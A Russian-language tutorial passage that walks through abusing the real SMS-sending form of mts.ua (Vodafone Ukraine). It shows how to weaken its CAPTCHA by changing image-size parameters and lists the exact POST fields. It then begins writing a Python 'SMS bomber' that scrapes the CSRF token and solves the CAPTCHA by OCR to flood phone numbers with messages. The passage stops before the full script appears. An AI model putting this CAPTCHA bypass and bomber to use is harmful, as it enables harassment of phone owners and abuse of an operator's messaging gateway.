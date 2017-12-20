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Обзор онлайн SMS-сервиса Vodafone
Наш сегодняшний подопытный, портал
http://mts.ua, раньше принадлежал «МТС Украина». Эту контору выкупил Vodafone. Есть на этом сайте и форма отправки SMS.
Защищена она цифровой CAPTCHA из четырех символов. Стоит отметить, что форма позволяет отправлять SMS только клиентам Vodafone с префиксами номеров:
+38050
+38066
+38095
+38099
Теперь посмотрим на саму CAPTCHA. Как видишь, цифры вполне различимы. Они имеют красный цвет, но их верх обрезан, и расположены они очень близко друг к другу.
А теперь приглядимся более внимательно к той части скрипта, которая отображает CAPTCHA. Если мы сформируем ссылку
http://www.mts.ua/?r=site/captcha&v=5981aff096f17&widgetId=messager&width=115&height=42&backColor=0xffffff&foreColor=0xff0000
то увидим CAPTCHA с высотой 42 пикселя и 115 пикселей шириной. Изменив значения на 242 и 315, мы получим удивительный результат: обрезанный верх цифр уйдет и расстояние между символами увеличится.
При отправке SMS скрипту
http://www.mts.ua/ru/online-services/send-sms/ через метод POST передаются следующие параметры:
YII_CSRF_TOKEN— это CSRF-токен, который нужно прочитать из HTML один раз при подготовке рассылки;
widgetId:'messager'— это стандартное значение, оно не меняется;
MessageForm[network]:'38050'— из значения ясно, что это мобильная сеть;
MessageForm[phone]:'123-45-67'— номер телефона, куда отправляем SMS;
MessageForm[encoding]:'cyrilic'— кодировка сообщения, можно менять;
MessageForm[is_translit]:'0'— транслитерация (0 — выключена, 1 — включена);
MessageForm[message]:'Привет 123'— сам текст сообщения;
MessageForm[verifyCode]:'4444'— распознанная CAPTCHA.
Также не стоит забывать, что нужно хранить cookies! В дальнейшем мы к этому вернемся.
Разработка SMS-бомбера
Попробуем разработать SMS-бомбер — скрипт, который будет рассылать через гейт множество однотипных SMS-сообщений. Разрабатывать будем на Python 2.x, также нам понадобятся модули requests, pytesseract, Image.
Скрипт мы будем разрабатывать под Windows, с чем и связаны особенности установки Tesseract и настройки путей.
В самом начале мы получаем CSRF-токен:
def get_csrf():
xhtml=get_url("http://www.mts.ua/ru/online-services/send-sms/",1)
xs=xhtml.find("var csrfToken = '")
xl=len("var csrfToken = '")
csrf_=xhtml[xs+xl:xs+xl+40]
return csrf_
Функция очевидная — обычный поиск текста. CSRF-токен получаем всего один раз за всю рассылку.
Теперь нужно получить CAPTCHA и распознать ее. Для этого мы будем использовать Tesseract. Вначале нужно установить саму программу и модуль Python к ней. Полный исходный код функции можно посмотреть в скрипте, который я приведу в конце статьи.
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